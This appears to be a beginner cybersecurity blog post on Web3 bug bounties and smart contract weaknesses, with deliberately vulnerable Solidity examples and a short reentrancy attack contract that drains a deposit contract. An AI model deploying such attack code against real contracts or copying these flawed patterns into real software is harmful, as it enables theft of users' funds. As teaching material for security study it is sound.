Hello Hackers,
Let’s read some Cybersecurity Blogs…
Web3 is an innovative technology that promises significantly stronger security than its predecessor, Web2. Unlike Web2, Web3 is decentralized and built on blockchain, which allows it to work seamlessly with cryptocurrencies and NFTs. However, the newness of Web3 means that companies are not yet prepared for the unique risks and security challenges it presents. To stay ahead of the competition, businesses must proactively anticipate and prevent potential security issues. In light of the millions of dollars at stake in Web3 applications, some companies have implemented bug bounty programs and incentivized ethical hackers to secure their platforms.
Web3 Bug Bounty
The topic of Web3 bug bounty is relatively new, and there aren’t many platforms available for it. However, a cybersecurity consulting firm called Hacken began offering cybersecurity services for blockchain security in 2017, with Hackenproof as one of its subsidiaries. Immunefi is another web3 bug bounty platform that emerged in 2020. It offers substantial rewards to ethical hackers, with some programs like “wormhole” offering up to $10,000,000 for identifying critical smart contract bugs.
Decentralized Application (DApp):
A decentralized application, or DApp, is a type of application that runs on a decentralized network and uses a smart contract developed with Ethereum. Unlike centralized applications that use a single computer, DApps operate on a peer-to-peer network of computers and store data on a blockchain. Smart contracts on Ethereum are transparent and open-source, allowing for secure and trustworthy execution of the application’s logic.
Decentralized Finance (DeFi):
Decentralized Finance (DeFi) offers financial services that don’t require intermediaries such as banks or brokerages. DeFi applications allow users to save, borrow, lend, and trade without any fees that traditional financial institutions typically charge. Moreover, these applications are highly accessible and fast, and anyone can use them without requiring prior approval. DeFi applications are powered by blockchain technology, and they are managed and operated by DApps, which facilitate and process transactions.
Learning programming is essential if you want to develop Ethereum decentralized applications (DApps), which have a smart contract (typically written in Solidity) and a frontend user interface. The smart contract may be written by you or someone else since all Ethereum smart contracts are open source.
DeFi offers transparency and accessibility, which are some of its benefits. Unlike in Web 2.0, where a small development team writes the code and others cannot see it, Web3 applications are developed in full view of everyone.
Solidity is the most widely used programming language for creating smart contracts on Ethereum. It is an object-oriented language that provides a high-level interface for developing smart contracts. If you have prior programming experience, Solidity is relatively easy to learn. “Solidity by Example” and “cryptozombies” is a useful resource for mastering Solidity.
Another popular language for creating smart contracts is JavaScript. This versatile language can be used on both the client and server sides. To learn JavaScript, “JavaScript: The Definitive Guide” is a recommended book. The most widely used JavaScript libraries for web3 are web3.js and ethers.js. Besides Solidity and JavaScript, Viper and Rust are also good choices for developing smart contracts.
There are notable differences between web2 bugs and web3 bugs. While web2 bugs can be found in web3 applications, they are not found in smart contracts. Vulnerabilities in smart contracts are classified using the Smart Contract Weakness Classification (SWC) instead of CWE. A comprehensive list of smart contract weaknesses can be found in The SWC Registry. This article aims to introduce some of the most prevalent web3 vulnerabilities.
Function default visibility (SWC-100)
An issue can arise when a function’s visibility is not properly set by a developer, which can lead to unauthorized or unintended state changes if exploited by a malicious user.
pragma solidity ^0.4.24;
contract FunctionDefaultVisibility {
function withdrawWinnings() {
require(uint32(msg.sender) == 0);
_sendWinnings();
}
function _sendWinnings() {
msg.sender.transfer(this.balance);
}
}As you can see, no function visibility (private, public, internal…) has been set.
Unprotected Ethereum Withdrawal (SWC-105)
The vulnerability arises when a smart contract lacks proper access controls, which enables attackers to withdraw all funds from the contract. This could happen if the contract’s initialization function is mistakenly exposed. Sometimes, a developer might inadvertently expose the initialization function by giving it a name that doesn’t match the contract’s name, causing it to be included in the contract’s runtime code. This allows anyone to call the initialization function and reinitialize the contract, potentially enabling an attacker to take control of the contract and drain its funds.
Re-entrancy (SWC-107)
A reentrancy attack happens when a malicious contract, also known as an attacker contract, calls back into the calling contract before the first function invocation is finished. This can cause multiple invocations of the function to interact in unintended ways.
The vulnerability arises when a user requests a certain amount of ether, and an attacker exploits this by calling the withdraw() function. The attacker can transfer tokens even after having already received them since their balance is not yet reset to 0.
contract DepositFunds {
mapping(address => uint) public balances;
function deposit() public payable {
balances[msg.sender] += msg.value;
}
function withdraw() public {
uint bal = balances[msg.sender];
require(bal > 0);
(bool sent, ) = msg.sender.call{value: bal}("");
require(sent, "Failed to send Ether");
balances[msg.sender] = 0;
}
}
An attacker can create the following contract and exploit the reentrancy vulnerability :
contract Attack {
DepositFunds public depositFunds;
constructor(address _depositFundsAddress) {
depositFunds = DepositFunds(_depositFundsAddress);
}
// Fallback is called when DepositFunds sends Ether to this contract.
fallback() external payable {
if (address(depositFunds).balance >= 1 ether) {
depositFunds.withdraw();
}
}
function attack() external payable {
require(msg.value >= 1 ether);
depositFunds.deposit{value: 1 ether}();
depositFunds.withdraw();
}
}Malleable signatures (SWC-117)
One common misconception is that the use of cryptographic signature systems in Ethereum contracts ensures that signatures are unique. However, it is possible to alter Ethereum signatures in a way that remains valid without the possession of the private key. This is because elliptic key cryptography, which is used to generate signatures, involves three variables (v, r, and s), and by modifying these values in a specific way, one can obtain a valid signature even with an invalid private key.
Write to Arbitrary location (SWC-124)
Smart contracts store data at specific storage locations on the EVM, and it’s the contract’s responsibility to ensure that only authorized users or contracts can write to sensitive storage locations. If an attacker can write to arbitrary storage locations, they can bypass authorization checks and overwrite fields that contain critical information, such as the owner’s address.
pragma solidity ^0.4.25;
contract Wallet {
uint[] private bonusCodes;
address private owner;
constructor() public {
bonusCodes = new uint[](0);
owner = msg.sender;
}
function () public payable {
}
function PushBonusCode(uint c) public {
bonusCodes.push(c);
}
function PopBonusCode() public {
require(0 <= bonusCodes.length);
bonusCodes.length--;
}
function UpdateBonusCodeAt(uint idx, uint c) public {
require(idx < bonusCodes.length);
bonusCodes[idx] = c;
}
function Destroy() public {
require(msg.sender == owner);
selfdestruct(msg.sender);
}
}As you can see, in line 4 the bonusCodes variable declared that in line 26 we can write in this location.
Sources and resources
If you want to become proficient in identifying smart contract weaknesses, I recommend delving deeper into this area. One way to do this is by participating in Capture the Flag (CTF) events, which provide an Ethereum virtual machine for testing smart contract bugs. Popular CTFs for practicing smart contract vulnerabilities include Ethernaut Game, Capture the Ether, and VulnerableDefi.
Hackernoon offers solutions for these CTFs under the “solidity-hack” tag. Additionally, there are many tools that can assist you in the hunting process, such as Mythril, Surya, Seth, and DAppTools. By automating certain tasks, these tools can help you discover more bugs in less time.
After you have gained ample practice and knowledge in this area, you can become a skilled web3 hacker and potentially earn money by participating in web3 bug bounty programs. While you can practice by participating in existing programs, you may want to wait until you have expert-level skills before attempting to earn money through bug bounties.
Follow our other blogs on WEB3 Security Part_1 & Part_2
That’s all for the day!!!
Happy Hacking!!!
